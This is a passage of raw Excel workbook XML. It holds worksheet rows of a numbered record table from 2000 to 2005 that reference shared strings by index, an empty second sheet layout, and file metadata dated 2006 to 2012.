      <c r="E102" s="19" t="s">
        <v>316</v>
      </c>
      <c r="F102" s="13" t="s">
        <v>317</v>
      </c>
      <c r="G102" s="14" t="s">
        <v>326</v>
      </c>
      <c r="H102" s="12" t="s">
        <v>318</v>
      </c>
      <c r="I102" s="6"/>
    </row>
    <row r="103" spans="1:9" ht="14.25">
      <c r="A103" s="13">
        <v>101</v>
      </c>
      <c r="B103" s="13">
        <v>2005</v>
      </c>
      <c r="C103" s="10" t="s">
        <v>319</v>
      </c>
      <c r="D103" s="11" t="s">
        <v>320</v>
      </c>
      <c r="E103" s="19" t="s">
        <v>142</v>
      </c>
      <c r="F103" s="13" t="s">
        <v>321</v>
      </c>
      <c r="G103" s="14" t="s">
        <v>268</v>
      </c>
      <c r="H103" s="12" t="s">
        <v>322</v>
      </c>
      <c r="I103" s="6"/>
    </row>
    <row r="104" spans="1:9" ht="14.25">
      <c r="A104" s="13">
        <v>102</v>
      </c>
      <c r="B104" s="13">
        <v>2000</v>
      </c>
      <c r="C104" s="10">
        <v>20050165</v>
      </c>
      <c r="D104" s="11" t="s">
        <v>446</v>
      </c>
      <c r="E104" s="19" t="s">
        <v>323</v>
      </c>
      <c r="F104" s="13" t="s">
        <v>324</v>
      </c>
      <c r="G104" s="14" t="s">
        <v>410</v>
      </c>
      <c r="H104" s="12" t="s">
        <v>169</v>
      </c>
      <c r="I104" s="6" t="s">
        <v>325</v>
      </c>
    </row>
    <row r="105" spans="1:9" ht="14.25">
      <c r="A105" s="13">
        <v>103</v>
      </c>
      <c r="B105" s="13">
        <v>2004</v>
      </c>
      <c r="C105" s="10">
        <v>20040184</v>
      </c>
      <c r="D105" s="11" t="s">
        <v>451</v>
      </c>
      <c r="E105" s="19" t="s">
        <v>452</v>
      </c>
      <c r="F105" s="13" t="s">
        <v>453</v>
      </c>
      <c r="G105" s="11" t="s">
        <v>268</v>
      </c>
      <c r="H105" s="12" t="s">
        <v>454</v>
      </c>
      <c r="I105" s="6"/>
    </row>
    <row r="106" spans="1:9" ht="14.25">
      <c r="A106" s="13">
        <v>104</v>
      </c>
      <c r="B106" s="13">
        <v>2002</v>
      </c>
      <c r="C106" s="10">
        <v>202163346</v>
      </c>
      <c r="D106" s="11" t="s">
        <v>455</v>
      </c>
      <c r="E106" s="11" t="s">
        <v>452</v>
      </c>
      <c r="F106" s="13" t="s">
        <v>456</v>
      </c>
      <c r="G106" s="14" t="s">
        <v>463</v>
      </c>
      <c r="H106" s="17" t="s">
        <v>457</v>
      </c>
      <c r="I106" s="6"/>
    </row>
    <row r="107" spans="1:9" ht="14.25">
      <c r="A107" s="18">
        <v>105</v>
      </c>
      <c r="B107" s="18">
        <v>2002</v>
      </c>
      <c r="C107" s="10">
        <v>202163348</v>
      </c>
      <c r="D107" s="11" t="s">
        <v>458</v>
      </c>
      <c r="E107" s="11" t="s">
        <v>459</v>
      </c>
      <c r="F107" s="13" t="s">
        <v>460</v>
      </c>
      <c r="G107" s="14" t="s">
        <v>465</v>
      </c>
      <c r="H107" s="17" t="s">
        <v>461</v>
      </c>
      <c r="I107" s="6"/>
    </row>
    <row r="108" spans="1:9" ht="14.25">
      <c r="A108" s="13">
        <v>106</v>
      </c>
      <c r="B108" s="18">
        <v>2002</v>
      </c>
      <c r="C108" s="10">
        <v>202063309</v>
      </c>
      <c r="D108" s="11" t="s">
        <v>466</v>
      </c>
      <c r="E108" s="19" t="s">
        <v>252</v>
      </c>
      <c r="F108" s="13" t="s">
        <v>468</v>
      </c>
      <c r="G108" s="14" t="s">
        <v>469</v>
      </c>
      <c r="H108" s="21" t="s">
        <v>505</v>
      </c>
      <c r="I108" s="6"/>
    </row>
    <row r="109" spans="1:9" ht="14.25">
      <c r="A109" s="13">
        <v>107</v>
      </c>
      <c r="B109" s="13">
        <v>2004</v>
      </c>
      <c r="C109" s="10">
        <v>20040262</v>
      </c>
      <c r="D109" s="14" t="s">
        <v>467</v>
      </c>
      <c r="E109" s="19" t="s">
        <v>252</v>
      </c>
      <c r="F109" s="13" t="s">
        <v>470</v>
      </c>
      <c r="G109" s="14" t="s">
        <v>471</v>
      </c>
      <c r="H109" s="21" t="s">
        <v>506</v>
      </c>
      <c r="I109" s="6"/>
    </row>
    <row r="110" spans="1:9" ht="14.25">
      <c r="A110" s="13">
        <v>108</v>
      </c>
      <c r="B110" s="13">
        <v>2004</v>
      </c>
      <c r="C110" s="10" t="s">
        <v>495</v>
      </c>
      <c r="D110" s="11" t="s">
        <v>496</v>
      </c>
      <c r="E110" s="19" t="s">
        <v>255</v>
      </c>
      <c r="F110" s="13" t="s">
        <v>474</v>
      </c>
      <c r="G110" s="14"/>
      <c r="H110" s="12" t="s">
        <v>160</v>
      </c>
      <c r="I110" s="6"/>
    </row>
    <row r="111" spans="1:9" ht="14.25">
      <c r="A111" s="13">
        <v>109</v>
      </c>
      <c r="B111" s="13">
        <v>2002</v>
      </c>
      <c r="C111" s="10">
        <v>202355593</v>
      </c>
      <c r="D111" s="11" t="s">
        <v>497</v>
      </c>
      <c r="E111" s="19" t="s">
        <v>255</v>
      </c>
      <c r="F111" s="13" t="s">
        <v>472</v>
      </c>
      <c r="G111" s="14"/>
      <c r="H111" s="12" t="s">
        <v>475</v>
      </c>
      <c r="I111" s="6"/>
    </row>
    <row r="112" spans="1:9" ht="14.25">
      <c r="A112" s="13">
        <v>110</v>
      </c>
      <c r="B112" s="13">
        <v>2002</v>
      </c>
      <c r="C112" s="10">
        <v>202020745</v>
      </c>
      <c r="D112" s="11" t="s">
        <v>498</v>
      </c>
      <c r="E112" s="19" t="s">
        <v>476</v>
      </c>
      <c r="F112" s="13" t="s">
        <v>477</v>
      </c>
      <c r="G112" s="14"/>
      <c r="H112" s="12" t="s">
        <v>478</v>
      </c>
      <c r="I112" s="6"/>
    </row>
    <row r="113" spans="1:9" ht="14.25">
      <c r="A113" s="13">
        <v>111</v>
      </c>
      <c r="B113" s="13">
        <v>2002</v>
      </c>
      <c r="C113" s="10">
        <v>20204429</v>
      </c>
      <c r="D113" s="11" t="s">
        <v>499</v>
      </c>
      <c r="E113" s="19" t="s">
        <v>476</v>
      </c>
      <c r="F113" s="13" t="s">
        <v>479</v>
      </c>
      <c r="G113" s="14"/>
      <c r="H113" s="12" t="s">
        <v>480</v>
      </c>
      <c r="I113" s="6"/>
    </row>
    <row r="114" spans="1:9" ht="14.25">
      <c r="A114" s="13">
        <v>112</v>
      </c>
      <c r="B114" s="13">
        <v>2000</v>
      </c>
      <c r="C114" s="10">
        <v>20020050</v>
      </c>
      <c r="D114" s="11" t="s">
        <v>500</v>
      </c>
      <c r="E114" s="19" t="s">
        <v>481</v>
      </c>
      <c r="F114" s="13" t="s">
        <v>482</v>
      </c>
      <c r="G114" s="14"/>
      <c r="H114" s="12" t="s">
        <v>483</v>
      </c>
      <c r="I114" s="6"/>
    </row>
    <row r="115" spans="1:9" ht="14.25">
      <c r="A115" s="13">
        <v>113</v>
      </c>
      <c r="B115" s="13">
        <v>2004</v>
      </c>
      <c r="C115" s="10" t="s">
        <v>501</v>
      </c>
      <c r="D115" s="14" t="s">
        <v>503</v>
      </c>
      <c r="E115" s="19" t="s">
        <v>316</v>
      </c>
      <c r="F115" s="13" t="s">
        <v>484</v>
      </c>
      <c r="G115" s="14"/>
      <c r="H115" s="12" t="s">
        <v>485</v>
      </c>
      <c r="I115" s="6"/>
    </row>
    <row r="116" spans="1:9" ht="14.25">
      <c r="A116" s="13">
        <v>114</v>
      </c>
      <c r="B116" s="13">
        <v>2004</v>
      </c>
      <c r="C116" s="10" t="s">
        <v>502</v>
      </c>
      <c r="D116" s="11" t="s">
        <v>504</v>
      </c>
      <c r="E116" s="19" t="s">
        <v>316</v>
      </c>
      <c r="F116" s="13" t="s">
        <v>486</v>
      </c>
      <c r="G116" s="14"/>
      <c r="H116" s="12" t="s">
        <v>487</v>
      </c>
      <c r="I116" s="6"/>
    </row>
    <row r="117" spans="1:9" ht="14.25">
      <c r="A117" s="13">
        <v>115</v>
      </c>
      <c r="B117" s="13">
        <v>2004</v>
      </c>
      <c r="C117" s="10" t="s">
        <v>473</v>
      </c>
      <c r="D117" s="14" t="s">
        <v>488</v>
      </c>
      <c r="E117" s="19" t="s">
        <v>142</v>
      </c>
      <c r="F117" s="13" t="s">
        <v>489</v>
      </c>
      <c r="G117" s="14"/>
      <c r="H117" s="12" t="s">
        <v>490</v>
      </c>
      <c r="I117" s="6"/>
    </row>
    <row r="118" spans="1:9" ht="14.25">
      <c r="A118" s="13">
        <v>116</v>
      </c>
      <c r="B118" s="13">
        <v>2004</v>
      </c>
      <c r="C118" s="10" t="s">
        <v>491</v>
      </c>
      <c r="D118" s="11" t="s">
        <v>492</v>
      </c>
      <c r="E118" s="19" t="s">
        <v>142</v>
      </c>
      <c r="F118" s="13" t="s">
        <v>493</v>
      </c>
      <c r="G118" s="14"/>
      <c r="H118" s="12" t="s">
        <v>494</v>
      </c>
      <c r="I118" s="6"/>
    </row>
    <row r="119" spans="1:9" ht="14.25">
      <c r="A119" s="13">
        <v>117</v>
      </c>
      <c r="B119" s="13">
        <v>2002</v>
      </c>
      <c r="C119" s="10">
        <v>202033216</v>
      </c>
      <c r="D119" s="11" t="s">
        <v>508</v>
      </c>
      <c r="E119" s="19" t="s">
        <v>509</v>
      </c>
      <c r="F119" s="13" t="s">
        <v>510</v>
      </c>
      <c r="G119" s="14" t="s">
        <v>511</v>
      </c>
      <c r="H119" s="21" t="s">
        <v>520</v>
      </c>
      <c r="I119" s="6"/>
    </row>
    <row r="120" spans="1:9" ht="14.25">
      <c r="A120" s="13">
        <v>118</v>
      </c>
      <c r="B120" s="13">
        <v>2002</v>
      </c>
      <c r="C120" s="10">
        <v>202033218</v>
      </c>
      <c r="D120" s="11" t="s">
        <v>512</v>
      </c>
      <c r="E120" s="19" t="s">
        <v>509</v>
      </c>
      <c r="F120" s="13" t="s">
        <v>513</v>
      </c>
      <c r="G120" s="14" t="s">
        <v>511</v>
      </c>
      <c r="H120" s="21" t="s">
        <v>520</v>
      </c>
      <c r="I120" s="6"/>
    </row>
    <row r="121" spans="1:9" ht="14.25">
      <c r="A121" s="13">
        <v>119</v>
      </c>
      <c r="B121" s="13">
        <v>2002</v>
      </c>
      <c r="C121" s="10">
        <v>202033224</v>
      </c>
      <c r="D121" s="11" t="s">
        <v>514</v>
      </c>
      <c r="E121" s="19" t="s">
        <v>509</v>
      </c>
      <c r="F121" s="13" t="s">
        <v>515</v>
      </c>
      <c r="G121" s="14" t="s">
        <v>511</v>
      </c>
      <c r="H121" s="21" t="s">
        <v>520</v>
      </c>
      <c r="I121" s="6"/>
    </row>
    <row r="122" spans="1:9" ht="14.25">
      <c r="A122" s="13">
        <v>120</v>
      </c>
      <c r="B122" s="13">
        <v>2005</v>
      </c>
      <c r="C122" s="10" t="s">
        <v>521</v>
      </c>
      <c r="D122" s="11" t="s">
        <v>516</v>
      </c>
      <c r="E122" s="19" t="s">
        <v>517</v>
      </c>
      <c r="F122" s="13" t="s">
        <v>518</v>
      </c>
      <c r="G122" s="14"/>
      <c r="H122" s="12" t="s">
        <v>519</v>
      </c>
      <c r="I122" s="6"/>
    </row>
  </sheetData>
  <autoFilter ref="B2:I107"/>
  <mergeCells count="1">
    <mergeCell ref="A1:I1"/>
  </mergeCells>
  <printOptions/>
  <pageMargins left="0.54" right="0.27" top="0.95" bottom="0.49" header="0.5" footer="0.7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15"/>
  <sheetViews>
    <sheetView workbookViewId="0" topLeftCell="D1">
      <selection activeCell="J4" sqref="J4"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.00390625" defaultRowHeight="14.25"/>
  <cols>
    <col min="1" max="1" width="4.25390625" style="0" customWidth="1"/>
    <col min="2" max="2" width="5.125" style="0" customWidth="1"/>
    <col min="3" max="3" width="8.875" style="0" customWidth="1"/>
    <col min="4" max="4" width="23.875" style="0" customWidth="1"/>
    <col min="5" max="5" width="14.375" style="0" customWidth="1"/>
    <col min="6" max="6" width="8.125" style="0" customWidth="1"/>
    <col min="7" max="7" width="9.375" style="3" customWidth="1"/>
    <col min="8" max="8" width="7.00390625" style="3" customWidth="1"/>
    <col min="9" max="9" width="6.75390625" style="3" customWidth="1"/>
    <col min="10" max="10" width="6.875" style="3" customWidth="1"/>
    <col min="11" max="11" width="6.75390625" style="3" customWidth="1"/>
    <col min="12" max="12" width="7.25390625" style="3" customWidth="1"/>
    <col min="13" max="13" width="7.00390625" style="3" customWidth="1"/>
    <col min="14" max="14" width="12.125" style="3" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:14" s="15" customFormat="1" ht="31.5" customHeight="1">
      <c r="A1" s="33" t="s">
        <v>527</v>
      </c>
      <c r="B1" s="33"/>
      <c r="C1" s="33"/>
      <c r="D1" s="33"/>
      <c r="E1" s="33"/>
      <c r="F1" s="33"/>
      <c r="G1" s="33"/>
      <c r="H1" s="33"/>
      <c r="I1" s="33"/>
      <c r="J1" s="33"/>
      <c r="K1" s="33"/>
      <c r="L1" s="33"/>
      <c r="M1" s="33"/>
      <c r="N1" s="33"/>
    </row>
    <row r="2" spans="1:14" s="9" customFormat="1" ht="31.5" customHeight="1">
      <c r="A2" s="34" t="s">
        <v>522</v>
      </c>
      <c r="B2" s="31" t="s">
        <v>507</v>
      </c>
      <c r="C2" s="34" t="s">
        <v>265</v>
      </c>
      <c r="D2" s="35" t="s">
        <v>135</v>
      </c>
      <c r="E2" s="35" t="s">
        <v>144</v>
      </c>
      <c r="F2" s="35" t="s">
        <v>143</v>
      </c>
      <c r="G2" s="34" t="s">
        <v>523</v>
      </c>
      <c r="H2" s="28" t="s">
        <v>528</v>
      </c>
      <c r="I2" s="28" t="s">
        <v>529</v>
      </c>
      <c r="J2" s="36" t="s">
        <v>531</v>
      </c>
      <c r="K2" s="28" t="s">
        <v>524</v>
      </c>
      <c r="L2" s="28" t="s">
        <v>525</v>
      </c>
      <c r="M2" s="30" t="s">
        <v>530</v>
      </c>
      <c r="N2" s="30"/>
    </row>
    <row r="3" spans="1:14" s="9" customFormat="1" ht="31.5" customHeight="1">
      <c r="A3" s="35"/>
      <c r="B3" s="32"/>
      <c r="C3" s="35"/>
      <c r="D3" s="35"/>
      <c r="E3" s="35"/>
      <c r="F3" s="35"/>
      <c r="G3" s="34"/>
      <c r="H3" s="29"/>
      <c r="I3" s="29"/>
      <c r="J3" s="37"/>
      <c r="K3" s="29"/>
      <c r="L3" s="29"/>
      <c r="M3" s="8" t="s">
        <v>264</v>
      </c>
      <c r="N3" s="8" t="s">
        <v>526</v>
      </c>
    </row>
    <row r="4" spans="1:14" s="9" customFormat="1" ht="31.5" customHeight="1">
      <c r="A4" s="16"/>
      <c r="B4" s="16"/>
      <c r="C4" s="23"/>
      <c r="D4" s="24"/>
      <c r="E4" s="25"/>
      <c r="F4" s="16"/>
      <c r="G4" s="22"/>
      <c r="H4" s="22"/>
      <c r="I4" s="16"/>
      <c r="J4" s="16"/>
      <c r="K4" s="16"/>
      <c r="L4" s="16"/>
      <c r="M4" s="16"/>
      <c r="N4" s="16"/>
    </row>
    <row r="5" spans="1:14" s="9" customFormat="1" ht="31.5" customHeight="1">
      <c r="A5" s="16"/>
      <c r="B5" s="16"/>
      <c r="C5" s="23"/>
      <c r="D5" s="25"/>
      <c r="E5" s="25"/>
      <c r="F5" s="16"/>
      <c r="G5" s="22"/>
      <c r="H5" s="22"/>
      <c r="I5" s="16"/>
      <c r="J5" s="16"/>
      <c r="K5" s="16"/>
      <c r="L5" s="16"/>
      <c r="M5" s="16"/>
      <c r="N5" s="16"/>
    </row>
    <row r="6" spans="1:14" s="9" customFormat="1" ht="31.5" customHeight="1">
      <c r="A6" s="16"/>
      <c r="B6" s="16"/>
      <c r="C6" s="23"/>
      <c r="D6" s="24"/>
      <c r="E6" s="25"/>
      <c r="F6" s="16"/>
      <c r="G6" s="22"/>
      <c r="H6" s="22"/>
      <c r="I6" s="16"/>
      <c r="J6" s="16"/>
      <c r="K6" s="16"/>
      <c r="L6" s="16"/>
      <c r="M6" s="16"/>
      <c r="N6" s="16"/>
    </row>
    <row r="7" spans="1:14" s="9" customFormat="1" ht="31.5" customHeight="1">
      <c r="A7" s="16"/>
      <c r="B7" s="16"/>
      <c r="C7" s="23"/>
      <c r="D7" s="25"/>
      <c r="E7" s="25"/>
      <c r="F7" s="16"/>
      <c r="G7" s="22"/>
      <c r="H7" s="22"/>
      <c r="I7" s="16"/>
      <c r="J7" s="16"/>
      <c r="K7" s="16"/>
      <c r="L7" s="16"/>
      <c r="M7" s="16"/>
      <c r="N7" s="16"/>
    </row>
    <row r="8" spans="1:14" s="9" customFormat="1" ht="31.5" customHeight="1">
      <c r="A8" s="16"/>
      <c r="B8" s="16"/>
      <c r="C8" s="23"/>
      <c r="D8" s="25"/>
      <c r="E8" s="25"/>
      <c r="F8" s="16"/>
      <c r="G8" s="22"/>
      <c r="H8" s="22"/>
      <c r="I8" s="16"/>
      <c r="J8" s="16"/>
      <c r="K8" s="16"/>
      <c r="L8" s="16"/>
      <c r="M8" s="16"/>
      <c r="N8" s="16"/>
    </row>
    <row r="9" spans="1:14" s="9" customFormat="1" ht="31.5" customHeight="1">
      <c r="A9" s="16"/>
      <c r="B9" s="16"/>
      <c r="C9" s="23"/>
      <c r="D9" s="25"/>
      <c r="E9" s="25"/>
      <c r="F9" s="16"/>
      <c r="G9" s="22"/>
      <c r="H9" s="22"/>
      <c r="I9" s="16"/>
      <c r="J9" s="16"/>
      <c r="K9" s="16"/>
      <c r="L9" s="16"/>
      <c r="M9" s="16"/>
      <c r="N9" s="16"/>
    </row>
    <row r="10" spans="1:14" s="9" customFormat="1" ht="31.5" customHeight="1">
      <c r="A10" s="16"/>
      <c r="B10" s="16"/>
      <c r="C10" s="26"/>
      <c r="D10" s="24"/>
      <c r="E10" s="25"/>
      <c r="F10" s="16"/>
      <c r="G10" s="22"/>
      <c r="H10" s="22"/>
      <c r="I10" s="16"/>
      <c r="J10" s="16"/>
      <c r="K10" s="16"/>
      <c r="L10" s="16"/>
      <c r="M10" s="16"/>
      <c r="N10" s="16"/>
    </row>
    <row r="11" spans="1:14" s="9" customFormat="1" ht="31.5" customHeight="1">
      <c r="A11" s="16"/>
      <c r="B11" s="16"/>
      <c r="C11" s="23"/>
      <c r="D11" s="25"/>
      <c r="E11" s="25"/>
      <c r="F11" s="16"/>
      <c r="G11" s="22"/>
      <c r="H11" s="22"/>
      <c r="I11" s="16"/>
      <c r="J11" s="16"/>
      <c r="K11" s="16"/>
      <c r="L11" s="16"/>
      <c r="M11" s="16"/>
      <c r="N11" s="16"/>
    </row>
    <row r="12" spans="1:14" s="9" customFormat="1" ht="31.5" customHeight="1">
      <c r="A12" s="16"/>
      <c r="B12" s="16"/>
      <c r="C12" s="23"/>
      <c r="D12" s="25"/>
      <c r="E12" s="25"/>
      <c r="F12" s="16"/>
      <c r="G12" s="22"/>
      <c r="H12" s="22"/>
      <c r="I12" s="16"/>
      <c r="J12" s="16"/>
      <c r="K12" s="16"/>
      <c r="L12" s="16"/>
      <c r="M12" s="16"/>
      <c r="N12" s="16"/>
    </row>
    <row r="13" spans="1:14" s="9" customFormat="1" ht="31.5" customHeight="1">
      <c r="A13" s="16"/>
      <c r="B13" s="16"/>
      <c r="C13" s="23"/>
      <c r="D13" s="25"/>
      <c r="E13" s="25"/>
      <c r="F13" s="16"/>
      <c r="G13" s="22"/>
      <c r="H13" s="22"/>
      <c r="I13" s="16"/>
      <c r="J13" s="16"/>
      <c r="K13" s="16"/>
      <c r="L13" s="16"/>
      <c r="M13" s="16"/>
      <c r="N13" s="16"/>
    </row>
    <row r="14" spans="1:14" s="9" customFormat="1" ht="31.5" customHeight="1">
      <c r="A14" s="16"/>
      <c r="B14" s="16"/>
      <c r="C14" s="23"/>
      <c r="D14" s="24"/>
      <c r="E14" s="25"/>
      <c r="F14" s="16"/>
      <c r="G14" s="22"/>
      <c r="H14" s="22"/>
      <c r="I14" s="16"/>
      <c r="J14" s="16"/>
      <c r="K14" s="16"/>
      <c r="L14" s="16"/>
      <c r="M14" s="16"/>
      <c r="N14" s="16"/>
    </row>
    <row r="15" spans="1:14" s="9" customFormat="1" ht="31.5" customHeight="1">
      <c r="A15" s="16"/>
      <c r="B15" s="16"/>
      <c r="C15" s="23"/>
      <c r="D15" s="25"/>
      <c r="E15" s="25"/>
      <c r="F15" s="16"/>
      <c r="G15" s="22"/>
      <c r="H15" s="22"/>
      <c r="I15" s="16"/>
      <c r="J15" s="16"/>
      <c r="K15" s="16"/>
      <c r="L15" s="16"/>
      <c r="M15" s="16"/>
      <c r="N15" s="16"/>
    </row>
  </sheetData>
  <autoFilter ref="A3:N3"/>
  <mergeCells count="14">
    <mergeCell ref="H2:H3"/>
    <mergeCell ref="I2:I3"/>
    <mergeCell ref="J2:J3"/>
    <mergeCell ref="K2:K3"/>
    <mergeCell ref="L2:L3"/>
    <mergeCell ref="M2:N2"/>
    <mergeCell ref="B2:B3"/>
    <mergeCell ref="A1:N1"/>
    <mergeCell ref="A2:A3"/>
    <mergeCell ref="C2:C3"/>
    <mergeCell ref="D2:D3"/>
    <mergeCell ref="E2:E3"/>
    <mergeCell ref="F2:F3"/>
    <mergeCell ref="G2:G3"/>
  </mergeCells>
  <printOptions/>
  <pageMargins left="0.56" right="0.21" top="0.59" bottom="0.66"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JYT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dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>微软用户</cp:lastModifiedBy>
  <cp:lastPrinted>2008-12-26T02:31:01Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2006-04-20T06:49:07Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2012-06-07T03:49:01Z</dcterms:modified>
  <cp:category/>
  <cp:version/>
  <cp:contentType/>
  <cp:contentStatus/>
</cp:coreProperties>
</file>